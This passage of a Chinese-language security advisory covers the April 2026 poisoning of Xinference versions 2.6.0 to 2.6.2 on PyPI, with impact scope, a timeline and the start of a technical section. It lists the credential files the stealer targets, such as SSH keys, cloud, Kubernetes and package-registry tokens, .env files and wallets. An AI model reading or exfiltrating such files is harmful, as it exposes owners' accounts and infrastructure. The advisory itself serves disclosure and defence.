rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041725" src="https://wechat2rss.xlab.app/img-proxy/?k=23cdb1e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSN1XpibZbnkiaibwPHnE3nIIAG85UKjrWXU2rQwm9IhYNTJQHCfA5ckTkDXYcXbotLcQic74uAnQ8QScDI5iagjISuD5sE4FyS8J0I%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">攻击背景与起因</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里目安全技术中心监测到一起围绕Xinference开源推理框架的PyPI供应链投毒事件。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">根据xorbitsai/inference项目维护者于2026年4月22日在GitHub Issue #4828中的公开确认，攻击者已取得对合法PyPI发布线的实质控制能力，将xinference 2.6.0、2.6.1、2.6.2三个版本打上恶意载荷后直接通过官方发布通道分发。推断攻击者通过窃取维护者或CI凭据实现了对发布线的接管，但该路径目前尚未被官方完全闭环确认。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041726" src="https://wechat2rss.xlab.app/img-proxy/?k=7aa5d4d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRSb8t5aqAHYzQS6jvJrqNnKOm8fadpFuCiaahkDfeEiayyNvZdHepnS4dzdg2mO7qbIMGNM9YcLzJI0JV6ibEyNgr5L62eQ1lHia4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围与风险分析</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">根据项目官方公告与JFrog、OX Security等第三方研究分析，这次事件的核心影响不在于攻击者是否直接篡改Xinference项目代码仓库，而在于其能够通过合法的PyPI发布线将凭据窃取木马静默植入大量AI推理节点，并由此形成对云平台、代码托管、包仓库和数据库等多类下游资产的级联外泄风险。</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">受影响范围： PyPI上xinference 2.6.0、2.6.1、2.6.2三个版本，上传时间集中在2026年4月22日前后，已由项目方紧急yank；目前PyPI最新安全版本为2.5.0（发布于2026年4月12日前后）。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">暴露数据： 样本重点收集Linux主机上的SSH私钥与主机密钥、AWS/GCP/Azure云凭据与IMDSv2角色令牌、Kubernetes kubeconfig与service account token、Docker认证、npm/PyPI/Cargo发布令牌、.env与.gitconfig机密、数据库与邮件配置、Terraform状态、WireGuard与Helm数据、TLS私钥及Bitcoin/Ethereum/Solana/Cardano/Monero等加密钱包文件。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">级联风险： 由于Xinference天然部署在富含云凭据与模型资源的AI基础设施中，一旦导入即可能在极短时间内外传大量高价值凭据，进而引发云账号接管、K8s接管、包仓库二次投毒、源码泄露、数据库外泄与资金类欺诈等级联后果。</span></p></li></ul></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041723" src="https://wechat2rss.xlab.app/img-proxy/?k=1cf1cf31&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSFibOKdua3dibB12Ite1nvaPIRmSmowHx55lKt1vaqmvlticj2pCpD1F7HdCicr3YzAypOwKn9RIbyAST8iaIbIjlwQe9KwicicEWnXk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">受影响场景</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次事件主要影响在Linux服务器、GPU推理节点、Kubernetes节点、容器构建机、CI Runner或云主</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">机</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">上安装并</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">导</span><span leaf="">入过受影响版本的AI/ML团队、平台运维团队与自托管推理服务运营方，尤其是将以下资产直接置于Xinference部署环境中的场景：</span></p><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;" data-pm-slice="0 0 []"><span leaf="">~/.ssh/id_rsa 与 /etc/ssh/ssh_host_*_key</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">~/.aws/credentials、~/.aws/config 与IMDSv2角色令牌</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">~/.kube/config、</span></p><p style="word-break: break-all;"><span leaf="">/var/run/secrets/kubernetes.io/serviceaccount/token</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">~/.docker/config.json、~/.npmrc、~/.pypirc、</span></p><p style="word-break: break-all;"><span leaf="">~/.cargo/credentials.toml</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">.env、.env.local、.env.production、.git-credentials</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">.pgpass、.my.cnf、redis.conf、postfix sasl_passwd、terraform.tfvars、terraform.tfstate</span></p></li></ul><ul style="list-style-type: square;" class="list-paddingleft-1"><li><p style="word-break: break-all;"><span leaf="">.pem、.key、.p12、.pfx等TLS与证书私钥材料，以及加密货币钱包与keystore</span></p></li></ul><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">时公开情</span><span leaf="">报显示</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">本次</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">事件</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">尚</span><span leaf="">未出现针对官方Docker镜像的大规模成功投毒证据，已落地的供应链影响目前主要集中在PyPI发布线。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041724" src="https://wechat2rss.xlab.app/img-proxy/?k=046185fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTZqVwe23kSdL5cGKicjArbau9La65H9CibgqMibWdcLASgwDTBObDYmOzxxVictp1JHIyibu1RzHZY5dG9sLricoudz5UiafrVQ8PMzM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击时间线</span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;"><table style="border-collapse:collapse;width:494.2500pt;margin-left:4.6500pt;border:none;mso-border-left-alt:1.0000pt solid windowtext;mso-border-top-alt:1.0000pt solid windowtext;mso-border-right-alt:1.0000pt solid windowtext;mso-border-bottom-alt:1.0000pt solid windowtext;mso-border-insideh:1.0000pt solid windowtext;mso-border-insidev:1.0000pt solid windowtext;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr style="height:32.3000pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">时间</span></font></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">事件</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">详细说明</span></font></span></p></td><td rowspan="9" style="border-color:#d6d6d6;"></td></tr><tr style="height:45.0000pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2025/10</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">维护者关联机器人异常</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="Times New Roman"><span leaf="">XprobeBot</span></font><font face="仿宋_GB2312"><span leaf="">机器人账号开始出现异常活动，随后被怀疑是未经授权上传</span></font><font face="Times New Roman"><span leaf="">PyPI</span></font><font face="仿宋_GB2312"><span leaf="">包的关键切入点。</span></font></span></p></td></tr><tr style="height:45.7500pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="Times New Roman"><span leaf="">2025/12</span></font></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">CI/CD</span><font face="仿宋_GB2312"><span leaf="">风险披露期</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="Times New Roman"><span leaf="">JFrog</span></font><font face="仿宋_GB2312"><span leaf="">研究员报告</span></font><font face="Times New Roman"><span leaf="">xorbitsai/inference</span></font><font face="仿宋_GB2312"><span leaf="">仓库</span></font><font face="Times New Roman"><span leaf="">GitHub Actions</span></font><font face="仿宋_GB2312"><span leaf="">存在</span></font><font face="Times New Roman"><span leaf="">pull_request_target</span></font><font face="仿宋_GB2312"><span leaf="">命令注入风险，可理论上导致</span></font><font face="Times New Roman"><span leaf="">PYPI_PASSWORD</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">DOCKERHUB_PASSWORD</span></font><font face="仿宋_GB2312"><span leaf="">等机密泄露并形成供应链后果。</span></font></span></p></td></tr><tr style="height:29.2500pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2026/1/25</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="Times New Roman"><span leaf="">GitHub</span></font><font face="仿宋_GB2312"><span leaf="">公开披露</span></font><font face="Times New Roman"><span leaf="">CI/CD</span></font><font face="仿宋_GB2312"><span leaf="">漏洞</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">xorbitsai/inference</span><font face="仿宋_GB2312"><span leaf="">仓库</span></font><font face="Times New Roman"><span leaf="">Issue <a class="wx_topic_link" topic-id="moctiowq-3sl4nt" style="color: #576B95 !important;" data-topic="1" data-recommend="">#4528</a></span></font><font face="仿宋_GB2312"><span leaf="">公开说明该命令注入与仓库接管风险，影响可延伸至</span></font><font face="Times New Roman"><span leaf="">PyPI</span></font><font face="仿宋_GB2312"><span leaf="">和</span></font><font face="Times New Roman"><span leaf="">DockerHub</span></font><font face="仿宋_GB2312"><span leaf="">发布链，随后被标记为通过</span></font><font face="Times New Roman"><span leaf="">PR</span></font><font face="仿宋_GB2312"><span leaf="">修复，但与本次</span></font><font face="Times New Roman"><span leaf="">4</span></font><font face="仿宋_GB2312"><span leaf="">月投毒的直接因果关系尚未被官方闭环。</span></font></span></p></td></tr><tr style="height:45.0000pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2026/4/12</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">正版</span></font><span leaf="">2.5.0</span><font face="仿宋_GB2312"><span leaf="">发布</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">维护者按正常流程在</span></font><span leaf="">PyPI</span><font face="仿宋_GB2312"><span leaf="">发布</span></font><font face="Times New Roman"><span leaf="">xinference 2.5.0</span></font><font face="仿宋_GB2312"><span leaf="">（目前仍为推荐安全版本）。</span></font></span></p></td></tr><tr style="height:30.7500pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2026/4/22</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">恶意版本上传</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">XprobeBot</span><font face="仿宋_GB2312"><span leaf="">账号将</span></font><font face="Times New Roman"><span leaf="">Base64</span></font><font face="仿宋_GB2312"><span leaf="">混淆恶意载荷写入</span></font><font face="Times New Roman"><span leaf="">xinference/__init__.py</span></font><font face="仿宋_GB2312"><span leaf="">，并以</span></font><font face="Times New Roman"><span leaf="">2.6.0</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">2.6.1</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">2.6.2</span></font><font face="仿宋_GB2312"><span leaf="">三个版本推送至</span></font><font face="Times New Roman"><span leaf="">PyPI</span></font><font face="仿宋_GB2312"><span leaf="">，</span></font><font face="Times New Roman"><span leaf="">GitHub</span></font><font face="仿宋_GB2312"><span leaf="">侧无对应标签或提交。</span></font></span></p></td></tr><tr style="height:30.0000pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2026/4/22</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">社区发现异常行为</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">用户在安装</span></font><span leaf="">xinference 2.6.2</span><font face="仿宋_GB2312"><span leaf="">后发现服务出现异常行为，包括在服务器上执行与密码相关的</span></font><font face="Times New Roman"><span leaf="">grep</span></font><font face="仿宋_GB2312"><span leaf="">动作，并在</span></font><font face="Times New Roman"><span leaf="">GitHub Issue <a class="wx_topic_link" topic-id="moctiowr-g2hxw5" style="color: #576B95 !important;" data-topic="1" data-recommend="">#4828</a></span></font><font face="仿宋_GB2312"><span leaf="">告警。</span></font></span></p></td></tr><tr style="height:30.0000pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2026/4/22</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">官方确认遭攻击并撤回</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><font face="仿宋_GB2312"><span leaf="">项目维护者在</span></font><span leaf="">Issue <a class="wx_topic_link" topic-id="moctiowr-pjy18i" style="color: #576B95 !important;" data-topic="1" data-recommend="">#4828</a></span><font face="仿宋_GB2312"><span leaf="">明确回复</span></font><font face="Times New Roman"><span leaf="">&#34;Yes, we are under attack, we have just yanked those versions.&#34;</span></font><font face="仿宋_GB2312"><span leaf="">。</span></font><font face="Times New Roman"><span leaf="">JFrog</span></font><font face="仿宋_GB2312"><span leaf="">当日发布详细分析并纳入</span></font><font face="Times New Roman"><span leaf="">Xray (XRAY-96896)</span></font><font face="仿宋_GB2312"><span leaf="">，</span></font><font face="Times New Roman"><span leaf="">OX Security</span></font><font face="仿宋_GB2312"><span leaf="">发布独立确认。</span></font></span></p></td></tr><tr style="height:45.0000pt;"><td data-colwidth="201" width="201" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">2026/4/22</span></span></p></td><td data-colwidth="304" width="304" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">TeamPCP</span><font face="仿宋_GB2312"><span leaf="">公开否认</span></font></span></p></td><td data-colwidth="482" width="482" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="word-break:break-all;text-autospace:ideograph-numeric;mso-pagination:none;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style=""><span leaf="">TeamPCP</span><font face="仿宋_GB2312"><span leaf="">通过</span></font><font face="Times New Roman"><span leaf="">X</span></font><font face="仿宋_GB2312"><span leaf="">账号</span></font><font face="Times New Roman"><span leaf="">@pcpcats</span></font><font face="仿宋_GB2312"><span leaf="">公开否认参与本次事件</span></font></span></p></td></tr></tbody></table></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">技术特征与攻击行为分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: 